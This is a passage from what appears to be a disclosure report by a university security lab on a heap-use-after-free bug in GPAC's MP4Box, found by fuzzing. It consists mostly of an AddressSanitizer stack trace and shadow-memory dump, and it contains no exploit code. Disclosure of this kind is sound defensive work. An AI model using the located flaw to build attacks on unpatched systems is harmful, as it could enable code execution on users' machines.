    #7 0x7f8194598014 in BD\_DecMFFieldList /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/field\_decode.c:330:15
    #8 0x7f819459cd2f in gf\_bifs\_dec\_field /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/field\_decode.c:564:9
    #9 0x7f81945c0e7b in BM\_ParseFieldReplace /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:734:21
    #10 0x7f81945c4923 in BM\_ParseReplace /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:847:10
    #11 0x7f81945c7f12 in BM\_ParseCommand /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:915:8
    #12 0x7f81945c9706 in gf\_bifs\_flush\_command\_list /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:964:9
    #13 0x7f81945cc012 in gf\_bifs\_decode\_command\_list /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:1044:3
    #14 0x7f8195bc921f in gf\_sm\_load\_run\_isom /home/zw/AFL\_Fuzz\_Datas/gpac/src/scene\_manager/loader\_isom.c:303:10
    #15 0x7f8195a86732 in gf\_sm\_load\_run /home/zw/AFL\_Fuzz\_Datas/gpac/src/scene\_manager/scene\_manager.c:719:28
    #16 0x577f50 in dump\_isom\_scene /home/zw/AFL\_Fuzz\_Datas/gpac/applications/mp4box/filedump.c:207:14
    #17 0x53949f in mp4box\_main /home/zw/AFL\_Fuzz\_Datas/gpac/applications/mp4box/mp4box.c:6369:7
    #18 0x549801 in main /home/zw/AFL\_Fuzz\_Datas/gpac/applications/mp4box/mp4box.c:6834:1
    #19 0x7f8192985082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #20 0x42ac5d in \_start (/home/zw/AFL\_Fuzz\_Datas/gpac/bin/gcc/MP4Box+0x42ac5d)

0x610000001ad4 is located 148 bytes inside of 192-byte region \[0x610000001a40,0x610000001b00)
freed by thread T0 here:
    #0 0x4a5c52 in free (/home/zw/AFL\_Fuzz\_Datas/gpac/bin/gcc/MP4Box+0x4a5c52)
    #1 0x7f8193259324 in gf\_free /home/zw/AFL\_Fuzz\_Datas/gpac/src/utils/alloc.c:165:2
    #2 0x7f819378d74a in gf\_node\_free /home/zw/AFL\_Fuzz\_Datas/gpac/src/scenegraph/base\_scenegraph.c:1622:2
    #3 0x7f81938a38fc in QuantizationParameter\_Del /home/zw/AFL\_Fuzz\_Datas/gpac/src/scenegraph/mpeg4\_nodes.c:11981:2
    #4 0x7f81938962b1 in gf\_sg\_mpeg4\_node\_del /home/zw/AFL\_Fuzz\_Datas/gpac/src/scenegraph/mpeg4\_nodes.c:37743:3
    #5 0x7f8193774108 in gf\_node\_del /home/zw/AFL\_Fuzz\_Datas/gpac/src/scenegraph/base\_scenegraph.c:1904:59
    #6 0x7f8193763dc2 in gf\_node\_unregister /home/zw/AFL\_Fuzz\_Datas/gpac/src/scenegraph/base\_scenegraph.c:763:3
    #7 0x7f8193772a1c in gf\_node\_try\_destroy /home/zw/AFL\_Fuzz\_Datas/gpac/src/scenegraph/base\_scenegraph.c:669:9
    #8 0x7f81937ce9cc in gf\_sg\_command\_del /home/zw/AFL\_Fuzz\_Datas/gpac/src/scenegraph/commands.c:72:7
    #9 0x7f81945ca742 in gf\_bifs\_flush\_command\_list /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:990:5
    #10 0x7f81945cc012 in gf\_bifs\_decode\_command\_list /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:1044:3
    #11 0x7f8195bc921f in gf\_sm\_load\_run\_isom /home/zw/AFL\_Fuzz\_Datas/gpac/src/scene\_manager/loader\_isom.c:303:10
    #12 0x7f8195a86732 in gf\_sm\_load\_run /home/zw/AFL\_Fuzz\_Datas/gpac/src/scene\_manager/scene\_manager.c:719:28
    #13 0x577f50 in dump\_isom\_scene /home/zw/AFL\_Fuzz\_Datas/gpac/applications/mp4box/filedump.c:207:14
    #14 0x53949f in mp4box\_main /home/zw/AFL\_Fuzz\_Datas/gpac/applications/mp4box/mp4box.c:6369:7
    #15 0x549801 in main /home/zw/AFL\_Fuzz\_Datas/gpac/applications/mp4box/mp4box.c:6834:1
    #16 0x7f8192985082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16

previously allocated by thread T0 here:
    #0 0x4a5ebd in malloc (/home/zw/AFL\_Fuzz\_Datas/gpac/bin/gcc/MP4Box+0x4a5ebd)
    #1 0x7f8193259214 in gf\_malloc /home/zw/AFL\_Fuzz\_Datas/gpac/src/utils/alloc.c:150:9
    #2 0x7f819381fc84 in QuantizationParameter\_Create /home/zw/AFL\_Fuzz\_Datas/gpac/src/scenegraph/mpeg4\_nodes.c:12496:2
    #3 0x7f819388ffa6 in gf\_sg\_mpeg4\_node\_new /home/zw/AFL\_Fuzz\_Datas/gpac/src/scenegraph/mpeg4\_nodes.c:36871:10
    #4 0x7f8193796799 in gf\_node\_new /home/zw/AFL\_Fuzz\_Datas/gpac/src/scenegraph/base\_scenegraph.c:1996:51
    #5 0x7f8194595f4a in gf\_bifs\_dec\_node /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/field\_decode.c:900:15
    #6 0x7f8194598014 in BD\_DecMFFieldList /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/field\_decode.c:330:15
    #7 0x7f819459cd2f in gf\_bifs\_dec\_field /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/field\_decode.c:564:9
    #8 0x7f81945c0e7b in BM\_ParseFieldReplace /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:734:21
    #9 0x7f81945c4923 in BM\_ParseReplace /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:847:10
    #10 0x7f81945c7f12 in BM\_ParseCommand /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:915:8
    #11 0x7f81945c9706 in gf\_bifs\_flush\_command\_list /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:964:9
    #12 0x7f81945cc012 in gf\_bifs\_decode\_command\_list /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/memory\_decoder.c:1044:3
    #13 0x7f8195bc921f in gf\_sm\_load\_run\_isom /home/zw/AFL\_Fuzz\_Datas/gpac/src/scene\_manager/loader\_isom.c:303:10
    #14 0x7f8195a86732 in gf\_sm\_load\_run /home/zw/AFL\_Fuzz\_Datas/gpac/src/scene\_manager/scene\_manager.c:719:28
    #15 0x577f50 in dump\_isom\_scene /home/zw/AFL\_Fuzz\_Datas/gpac/applications/mp4box/filedump.c:207:14
    #16 0x53949f in mp4box\_main /home/zw/AFL\_Fuzz\_Datas/gpac/applications/mp4box/mp4box.c:6369:7
    #17 0x549801 in main /home/zw/AFL\_Fuzz\_Datas/gpac/applications/mp4box/mp4box.c:6834:1
    #18 0x7f8192985082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-use-after-free /home/zw/AFL\_Fuzz\_Datas/gpac/src/bifs/unquantize.c:175:12 in Q\_IsTypeOn
Shadow bytes around the buggy address:
  0x0c207fff8300: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c207fff8310: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c207fff8320: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c207fff8330: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c207fff8340: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
\=>0x0c207fff8350: fd fd fd fd fd fd fd fd fd fd\[fd\]fd fd fd fd fd
  0x0c207fff8360: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c207fff8370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c207fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c207fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c207fff83a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==1578219\==ABORTING

**Occurrences:**

gpac/src/bifs/unquantize.c:175:12 in Q\_IsTypeOn

**Impact**

can cause a program to crash, use unexpected values, or execute code.

**Report of the Information Security Laboratory of Ocean University of China @OUC\_ISLOUC @OUC\_Blue\_Whale**

Tag

#ssl